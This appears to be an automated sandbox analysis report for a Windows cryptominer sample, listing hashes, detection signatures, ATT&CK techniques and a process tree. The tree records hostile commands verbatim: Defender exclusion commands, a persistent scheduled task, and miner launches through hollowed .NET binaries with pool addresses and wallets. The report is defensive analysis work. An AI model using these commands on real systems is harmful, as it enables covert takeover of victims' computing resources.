Analysis

  • max time kernel
    70s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2022 09:43

General

  • Target

    a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f.exe

  • Size

    880KB

  • MD5

    dc993f2bde7c48504df0a30ed3095b4a

  • SHA1

    a9f030695570274d680c187a133473812e277de4

  • SHA256

    a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f

  • SHA512

    ed82e1fb3aa02b4c633ece17bbe2a5b419e1e7d63abbff662806d62b3d4d8336244f1669938f3459c72d82682c9e56a18da3000453db85b1b3934beaaf003760

  • SSDEEP

    6144:WmERrvsi0oAtnm2cbNrQXL5hevs8OwYP6PG2hTSk9FKrcSPCXiM8kWUXqTlr3fFo:WmSitm2cRg2R9F+cUBYIiYV9XBcZ

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detectes Phoenix Miner Payload 3 IoCs
  • XMRig Miner payload 13 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f.exe
    "C:\Users\Admin\AppData\Local\Temp\a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1316
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp34C.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:636
      • C:\ProgramData\APPDATA\MFMKD.exe
        "C:\ProgramData\APPDATA\MFMKD.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1476
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:872
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MFMKD" /tr "C:\ProgramData\APPDATA\MFMKD.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1480
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MFMKD" /tr "C:\ProgramData\APPDATA\MFMKD.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1028
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 48VEAHc7WyvjcqQ3ntWoFcUHJ4jFFzeqHfCfZm6Jqom2XPJi2UF4Nytis39sEd8J6D92T3QEuajznPfRQQ7nfpMiVmCFXaf -R --variant=-1 --max-cpu-usage=65 --donate-level=1 -opencl
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1224
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xbe0Cb1B7eEEF54A1b942c54a2700826A73B9Fb48.Rig001 -coin etc -log 0
          4⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:1524

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Scripting

1
T1064

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\APPDATA\MFMKD.exe
    Filesize

    880KB

    MD5

    dc993f2bde7c48504df0a30ed3095b4a

    SHA1

    a9f030695570274d680c187a133473812e277de4

    SHA256

    a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f

    SHA512

    ed82e1fb3aa02b4c633ece17bbe2a5b419e1e7d63abbff662806d62b3d4d8336244f1669938f3459c72d82682c9e56a18da3000453db85b1b3934beaaf003760

  • C:\ProgramData\APPDATA\MFMKD.exe
    Filesize

    880KB

    MD5

    dc993f2bde7c48504df0a30ed3095b4a

    SHA1

    a9f030695570274d680c187a133473812e277de4

    SHA256

    a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f

    SHA512

    ed82e1fb3aa02b4c633ece17bbe2a5b419e1e7d63abbff662806d62b3d4d8336244f1669938f3459c72d82682c9e56a18da3000453db85b1b3934beaaf003760

  • C:\Users\Admin\AppData\Local\Temp\tmp34C.tmp.bat
    Filesize

    140B

    MD5

    3736efb61baa2f8d73f445ff4cfada52

    SHA1

    d226176f1d40f3be02ef01cc83146e2d69dc34ff

    SHA256

    e60571c8c660a29dafbcf53acd315a4cd0efacf7a6588a278e69e1e9326c6a95

    SHA512

    1f825259fbc5e9f803e3dc5a73e37f3b19a989da037d9a59f0763a13b4aac543c30655547f7b3a7812907909ffe4b230c0a5ae204b77d7792105895b64f5ae57

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    de519c6a7c4fcee96fdc5308f923a224

    SHA1

    c977b472af9493a6fa0bc2d3bbb6d41dac1e7a5f

    SHA256

    074e859d50e9af4c80bb2f1cf26d7c25cff3a12938f11af4015cfe079528db48

    SHA512

    3ab6d4f1568ed19bc1729faa327d63a53df27ff9eb86e9e9c3aa8276e0ccf049875d313b2ba382872ba90535364c977a8855e4e54fad24aeedb45f516078fe14

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    de519c6a7c4fcee96fdc5308f923a224

    SHA1

    c977b472af9493a6fa0bc2d3bbb6d41dac1e7a5f

    SHA256

    074e859d50e9af4c80bb2f1cf26d7c25cff3a12938f11af4015cfe079528db48

    SHA512

    3ab6d4f1568ed19bc1729faa327d63a53df27ff9eb86e9e9c3aa8276e0ccf049875d313b2ba382872ba90535364c977a8855e4e54fad24aeedb45f516078fe14

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    207223f23262b59838493c5cbc802643

    SHA1

    992284fcb750120e05a9a1a8ff017389ee8786c1

    SHA256

    b030faf580426506d9706a02c6fb29f48de22ab9a8ccd6d23c9c7594ddabfe29

    SHA512

    b50201736c8cad914fa1f6037c79829f710cf98719b0dc8ea26fa649373c77cc8af36d41670fcd077e2b8ea2a8b5b1729f1762b674e750f3f15646d66b03e1b8

  • \ProgramData\APPDATA\MFMKD.exe
    Filesize

    880KB

    MD5

    dc993f2bde7c48504df0a30ed3095b4a

    SHA1

    a9f030695570274d680c187a133473812e277de4

    SHA256

    a53f236cc47d299313d491db76261e2f3ac83b0bc0f469175a6591830836281f

    SHA512

    ed82e1fb3aa02b4c633ece17bbe2a5b419e1e7d63abbff662806d62b3d4d8336244f1669938f3459c72d82682c9e56a18da3000453db85b1b3934beaaf003760

  • memory/636-64-0x0000000000000000-mapping.dmp
  • memory/872-91-0x000000001B730000-0x000000001BA2F000-memory.dmp
    Filesize

    3.0MB

  • memory/872-95-0x00000000025F4000-0x00000000025F7000-memory.dmp
    Filesize

    12KB

  • memory/872-83-0x000007FEEBC90000-0x000007FEEC7ED000-memory.dmp
    Filesize

    11.4MB

  • memory/872-71-0x0000000000000000-mapping.dmp
  • memory/872-86-0x00000000025F4000-0x00000000025F7000-memory.dmp
    Filesize

    12KB

  • memory/872-103-0x00000000025F4000-0x00000000025F7000-memory.dmp
    Filesize

    12KB

  • memory/872-80-0x000007FEED740000-0x000007FEEE163000-memory.dmp
    Filesize

    10.1MB

  • memory/872-104-0x00000000025FB000-0x000000000261A000-memory.dmp
    Filesize

    124KB

  • memory/892-62-0x0000000000000000-mapping.dmp
  • memory/1028-78-0x0000000000000000-mapping.dmp
  • memory/1224-117-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-128-0x00000000000E0000-0x0000000000100000-memory.dmp
    Filesize

    128KB

  • memory/1224-142-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-130-0x0000000000000000-0x0000000001000000-memory.dmp
    Filesize

    16.0MB

  • memory/1224-129-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-127-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-125-0x0000000140343234-mapping.dmp
  • memory/1224-124-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-122-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-120-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-119-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-115-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-114-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-112-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-110-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-108-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-106-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1224-105-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1316-96-0x0000000002204000-0x0000000002207000-memory.dmp
    Filesize

    12KB

  • memory/1316-61-0x000007FEED740000-0x000007FEEE163000-memory.dmp
    Filesize

    10.1MB

  • memory/1316-87-0x0000000002204000-0x0000000002207000-memory.dmp
    Filesize

    12KB

  • memory/1316-88-0x000007FEEBC90000-0x000007FEEC7ED000-memory.dmp
    Filesize

    11.4MB

  • memory/1316-56-0x0000000000000000-mapping.dmp
  • memory/1316-92-0x000000001B890000-0x000000001BB8F000-memory.dmp
    Filesize

    3.0MB

  • memory/1316-100-0x000000000220B000-0x000000000222A000-memory.dmp
    Filesize

    124KB

  • memory/1316-97-0x0000000002204000-0x0000000002207000-memory.dmp
    Filesize

    12KB

  • memory/1348-54-0x0000000000AB0000-0x0000000000B90000-memory.dmp
    Filesize

    896KB

  • memory/1444-69-0x00000000003A0000-0x0000000000480000-memory.dmp
    Filesize

    896KB

  • memory/1444-66-0x0000000000000000-mapping.dmp
  • memory/1476-99-0x00000000029CB000-0x00000000029EA000-memory.dmp
    Filesize

    124KB

  • memory/1476-81-0x000007FEEBC90000-0x000007FEEC7ED000-memory.dmp
    Filesize

    11.4MB

  • memory/1476-93-0x00000000029C4000-0x00000000029C7000-memory.dmp
    Filesize

    12KB

  • memory/1476-89-0x000000001B800000-0x000000001BAFF000-memory.dmp
    Filesize

    3.0MB

  • memory/1476-79-0x000007FEED740000-0x000007FEEE163000-memory.dmp
    Filesize

    10.1MB

  • memory/1476-84-0x00000000029C4000-0x00000000029C7000-memory.dmp
    Filesize

    12KB

  • memory/1476-70-0x0000000000000000-mapping.dmp
  • memory/1476-98-0x00000000029C4000-0x00000000029C7000-memory.dmp
    Filesize

    12KB

  • memory/1480-74-0x0000000000000000-mapping.dmp
  • memory/1524-134-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-137-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-141-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-140-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-139-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-138-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-136-0x0000000140829C40-mapping.dmp
  • memory/1524-135-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-131-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/1524-132-0x0000000140000000-0x000000014082B000-memory.dmp
    Filesize

    8.2MB

  • memory/2044-57-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp
    Filesize

    8KB

  • memory/2044-60-0x000007FEED740000-0x000007FEEE163000-memory.dmp
    Filesize

    10.1MB

  • memory/2044-102-0x0000000002A0B000-0x0000000002A2A000-memory.dmp
    Filesize

    124KB

  • memory/2044-90-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
    Filesize

    3.0MB

  • memory/2044-55-0x0000000000000000-mapping.dmp
  • memory/2044-82-0x000007FEEBC90000-0x000007FEEC7ED000-memory.dmp
    Filesize

    11.4MB

  • memory/2044-85-0x0000000002A04000-0x0000000002A07000-memory.dmp
    Filesize

    12KB

  • memory/2044-101-0x0000000002A04000-0x0000000002A07000-memory.dmp
    Filesize

    12KB

  • memory/2044-94-0x0000000002A04000-0x0000000002A07000-memory.dmp
    Filesize

    12KB